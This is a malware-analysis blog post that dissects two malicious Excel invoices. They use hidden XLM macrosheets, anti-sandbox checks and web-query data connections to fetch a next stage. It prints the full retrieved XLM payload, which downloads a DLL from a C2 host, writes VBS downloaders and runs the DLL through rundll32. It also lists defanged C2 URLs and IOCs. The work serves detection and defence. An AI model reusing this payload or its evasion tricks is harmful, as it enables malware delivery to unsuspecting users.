Skip to main content

Getting Sneakier: Hidden Sheets, Data Connections, and XLM Macros

Posted on 2020-03-18 by Amirreza Niakanlahiji and Pedram Amini

Introduction

In January of 2019, we published a blog titled "Extracting 'Sneaky' Excel XLM Macros"  that detailed a technique attackers had adopted for embedding malicious logic under a less understood facet of Excel Spreadsheets, Excel 4.0 macros aka XLM macros.

Over the past few weeks, we have observed a surge in maldocs leveraging XLM macros. A trend that other researchers have noticed and provided analysis on. Examples include "A Safe Excel Sheet Not So Safe" written by Xavier Mertens, as well as "Excel 4.0 Macro MalSpam Campaigns" written by Diana Lopera.

In this post, we provide a detailed analysis of an interesting campaign that is tied to a variety of executable payloads, a subject matter we'll be covering in a future blog. As of the time of writing, detection rates for this class of attack are relatively low, and these samples happily bypass the internal GSuite and O365 protection mechanisms.

We'll dive into the analysis of two separate documents. The first one was attached to an email that was sent to us directly by the threat actor in late February (offline). The second was captured on March 17th, and in this case, the C2 servers are currently active.

Document One: inv-27101.xls

sha256: a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af | InQuest Labs - InQuest.net | VirusTotal

Image removed.

 

Document Two: Invoice85005.xls

sha256: bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f | InQuest Labs - InQuest.net | VirusTotal

Image removed.

 

Analysis of Document One: inv-27101.xls

Depicted below is a graphic extracted from this malicious document lure. This is a common tactic employed by attackers today. To embed coercive text within an image in an attempt to bypass string-based detection engines while social engineering the target into activating the embedded logic. This document has one Excel sheet and one hidden macrosheet:

Image removed.

The macrosheet can be easily unhidden through the Microsoft Excel UI/UX, as seen here in this animation:

Image removed.

Once the target user enables the active content, an Auto_Open sequence is activated that pivots to the cell D49, the contents of which are shown here:

Image removed.

This embedded macro first checks a few conditions before executing its primary directive, exiting early if any of the following conditions are not met:

  • The cell containing GET.WORKSPACE(19) ensures a mouse is present.

  • The cell containing GET.WORKSPACE(42) ensures that the system is capable of playing sounds.

  • The cell containing GET.WORKSPACE(1) ensures that the environment is Windows.

These routines are anti-sandbox tactics. The actor wants to ensure that the sample is not being detonated by a behavioral analysis tool. To learn more about the GET.WORKSPACE() function, see Excel 4.0 Macro Functions Reference.

Assuming the conditions are met, the primary directive stored within the cell labeled 'asdf' is executed. Let's take a look at the cell 'asdf', depicted below:

Image removed.

This logic checks for content in the cell U113 of the first sheet every 2 seconds, in search of the string 'LOS'. The loop is continued while there is a matching; otherwise, execution continues within the I66 cell, which is pointed by 'sfgdfsh' label. The code on line I66 to I69, basically copies the cells U110-U113 in Sheet1 to I70-I73 cell in the macrosheet.

Image removed.

If you check the content of U110 to U113 cells on the Sheet1, without enabling the active content, you see that these cells are empty. This is the most interesting aspect of this campaign as, so far as we know, a novel technique. A "web query" object is utilized by the maldoc to pull cell content from a remote URL. The web query sends the request to this remote server upon document activation and keeps sending requests every few seconds after. One can see the reference URL (hxxps://pnxkntdl[.]xyz/KJSDBViad7) in clear text by simply opening the document in a hex viewer for example:

Image removed.

To further analyze how the URL is triggered, we'll use BiffView to parse the Excel document. If you search for the byte sequence '68 74 74 70' ("HTTP") you'll find that the URL lives within a BIFF DCONN object. This object triggers the web query, see the relevant flags highlighted in the depiction below that aligns the BIFF record with the relevant documentation:

Image removed.

The data returned from the remote URL is an XHTML (XML) document.

Image removed.

And the web query content is enclosed within the '<PRE>' element of that

Image removed.

The web query requests and responses are sent over an encrypted channel (HTTPS). To pierce into the communications between Excel and the remote site, we use mitmproxy. By default, mitmproxy listens on 127.0.0.1:8080. We change the proxy setting of the system to redirect all traffic through 127.0.0.1:8080:

Image removed.

The following content was returned from the remote URL, when the web query was executed in our lab:

<html>
<head><base href="/lander/excel4_1581586732/index.html">
<link rel="stylesheet" href="resource://content-accessible/plaintext.css">
</head>
<body>
<pre>
=CLOSE(FALSE)
=CLOSE(FALSE)
=CLOSE(FALSE)
=CLOSE(FALSE)"</pre>
</body>
</html>

The content of <pre> element is copied to the cells U110 through U113. Because the resulting content of U110 will contain the substring 'LOS', the macro will loop and checks again within two seconds. This retrieved payload is completely benign. So what's going on here? This is good operational security on behalf of the actor. The remote server has not deemed us worthy of receiving the next stage of this malware. Perhaps the restriction is regional, maybe something else, luckily.... we got another document.

Analysis of Document Two: Invoice85005.xls

Similar to the previous sample, this one contains an Excel sheet and "very" hidden macrosheet. Very hidden macro sheets can not be revealed via a simple UI/UX toggle. They must be hex edited to be visible within the native Excel application. See our previous blog for more information. Again, a graphical lure with coercive text is used to entice the user into activating the embedded logic:

Image removed.

To unhide the macrosheet, we use Hexinator to change the type of the macrosheet manually. We know from previous research that a hidden and a very hidden sheet starts with "85 00 ?? ?? ?? ?? ?? ?? 01 01" and "85 00 ?? ?? ?? ?? ?? ?? 02 01" patterns respectively. To unhide these sheets, we just need to set the ninth byte to zero, as shown here in an animation:

Image removed.

Again, the macro checks a few conditions:

=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=GET.WORKSPACE(13)
=GET.WORKSPACE(14)
=IF(H24<770, CLOSE(FALSE),)
=IF(H25<381, CLOSE(FALSE),)
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ON.TIME(NOW()+"00:00:02", "agawf23f"),CLOSE(TRUE))
=RETURN()

it also checks whether the macrosheet is hidden

=WORKBOOK.HIDE("0TQ1ByZPP5", TRUE)

We can easily patch this condition by changing TRUE to FALSE.

It then jumps to U33 (agawf23f label):

=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "rstegerg3"))
=RETURN()
=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "agawf23f"))
=RETURN()

This file also contains a web query object. The remote URL is seen below (hxxps://tdvomds[.]pw/12341324rfefv):

Image removed.

The web query will populate a few cells in Sheet1 if it can successfully connect to the remote URL. The above macrosheet copies these cells from Sheet1 to the macrosheet and then executes the lines.

Again, we use mitmproxy to capture the webquery response. Another approach is to modify the macro to prevent the execution of the second-level macro before enabling the macro. However, we are also interested in capturing the HTTP response.

Image removed.

The HTTP response contains an XHTML document, and this time, we are worthy of receiving the next-stage payload:

<html>
<head><base href="/lander/df3f1f14f134f314f/index.html">
<link rel="stylesheet" href="resource://content-accessible/plaintext.css">
</head>
<body>
<pre>
="https://tdvomds.pw/fef23f23f"<br>
=GET.WORKSPACE(26)<br>
="C:\Users\"&R[-1]C&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"<br>
="C:\Users\"&R[-2]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(100,999)&".vbs"<br>
="C:\Users\"&R[-3]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(1000,9999)&".vbs"<br>
=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))), GOTO(R[2]C),)<br>
=IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))), GOTO(R[7]C),)<br>
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-7]C,R[-5]C,0,0)<br>
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",""&R[-7]C&",DllRegisterServer",0,5)<br>
=CLOSE(FALSE)<br>
=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>
=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>
=FOPEN(R[-10]C,3)<br>
=FWRITELN(R[-1]C,"Dim "&R[-3]C&", "&R[-2]C&"")<br>
=FWRITELN(R[-2]C,"Set "&R[-4]C&" = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")<br>
=FWRITELN(R[-3]C,""&R[-5]C&".setOption(2) = 13056")<br>
=FWRITELN(R[-4]C,""&R[-6]C&".Open ""GET"", """&R[-17]C&""", False")<br>
=FWRITELN(R[-5]C,""&R[-7]C&".setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")<br>
=FWRITELN(R[-6]C,""&R[-8]C&".Send")<br>
=FWRITELN(R[-7]C,"If "&R[-9]C&".Status = 200 Then")<br>
=FWRITELN(R[-8]C,"Set "&R[-9]C&" = CreateObject(""ADODB.Stream"")")<br>
=FWRITELN(R[-9]C,""&R[-10]C&".Open")<br>
=FWRITELN(R[-10]C,""&R[-11]C&".Type = 1")<br>
=FWRITELN(R[-11]C,""&R[-12]C&".Write "&R[-13]C&".ResponseBody")<br>
=FWRITELN(R[-12]C,""&R[-13]C&".SaveToFile """&R[-23]C&""", 2")<br>
=FWRITELN(R[-13]C,""&R[-14]C&".Close")<br>
=FWRITELN(R[-14]C,"End If")<br>
=FCLOSE(R[-15]C)<br>
=EXEC("explorer.exe "&R[-26]C&"")<br>
=WAIT(NOW()+"00:00:05")<br>
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>
=FOPEN(R[-28]C,3)<br>
=FWRITELN(R[-1]C,"Set obj = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")<br>
=FWRITELN(R[-2]C,"obj.Document.Application.ShellExecute ""rundll32.exe"","" "&R[-32]C&",DllRegisterServer"",""C:\Windows\System32"",Null,0")<br>
=FCLOSE(R[-3]C)<br>
=EXEC("explorer.exe "&R[-32]C&"")<br>
=FILE.DELETE(R[-34]C)<br>
=CLOSE(FALSE)<br>
=RETURN()<br>
</pre>
</body>
</html>

 

The content of "<pre>" element from the XHTML document is written to the sheet and executed as the next-stage:

Image removed.

In this particular case, the pivot macro downloads a DLL file from hxxps://tdvomds[.]pw/fef23f23f (acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd (warning, actual sample) and executes rundll32 to call its DllRegisterServer function to register/execute it. The logic within the DLL communicates with the following C&C servers:

  • hxxps://aquolepp[.]pw/milagrecf.php

  • hxxps://dhteijwrb[.]host/milagrecf.php

Image removed.

Detection and Mitigation

Optical Character Recognition (OCR)

A solid generic approach to detect this and many similar malicious document lures is to carve out the embedded image and then extract the semantic content via OCR. Within the XLS/BIFFv8 format, records have a maximum size of 8,228 bytes. If the size of data is greater than what can fit in a single record, then the data must be split into chunks. The first chunk is put in the first record, and the rest of the data chunks are placed in subsequent CONTINUE (3Ch) records. To successfully extract images from XLM files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we've extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our Github repository (lines 570 to 603):

https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592

Suspicious Attributes

Didier Steven's oledump is a de facto tool in the arsenal of a maldoc analyst. We can leverage the BIFF plugin modified above to extract images, to filter for the DCONN record leveraged by both of the documents to retrieve a next-stage pivot:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876"
  1:      4096 '\x05DocumentSummaryInformation'
  2:       240 '\x05SummaryInformation'
  3:    101088 'Workbook'
               Plugin: BIFF plugin
                 0876    135 DCONN : Data Connection

Additionally specifying the option to dump contents as a string, one can expose the embedded URL as well:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876 -s"
  1:      4096 '\x05DocumentSummaryInformation'
  2:       240 '\x05SummaryInformation'
  3:    101088 'Workbook'
               Plugin: BIFF plugin
                 0876    135 DCONN : Data Connection
                  ASCII:
                   Connection
                   hxxps://pnxkntdl[.]xyz/KJSDBViad7
                   Sheet1!DSKVJBdsj2

We've written and open-sourced a generic YARA hunting rule that looks for Microsoft Excel documents that contain a DCONN record and a URL:

To increase the detection accuracy, we can combine the above YARA rule with the following one to check the existence of hidden and "very" hidden macro sheets:

The samples above are all available for research and download via our open data portal https://labs.inquest.net.

IOCs

  • a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af
  • acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd
  • bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f
  • hxxps://aquolepp[.]pw/milagrecf.php
  • hxxps://dhteijwrb[.]host/milagrecf.php
  • hxxps://pnxkntdl[.]xyz/KJSDBViad7
  • hxxps://tdvomds[.]pw/12341324rfefv
  • hxxps://tdvomds[.]pw/fef23f23f
  • aquolepp[.]pw
  • dhteijwrb[.]hos
  • pnxkntdl[.]xyz
  • tdvomds[.]pw
Tags
threat-hunting deep-file-inspection malware-analysis YARA open-source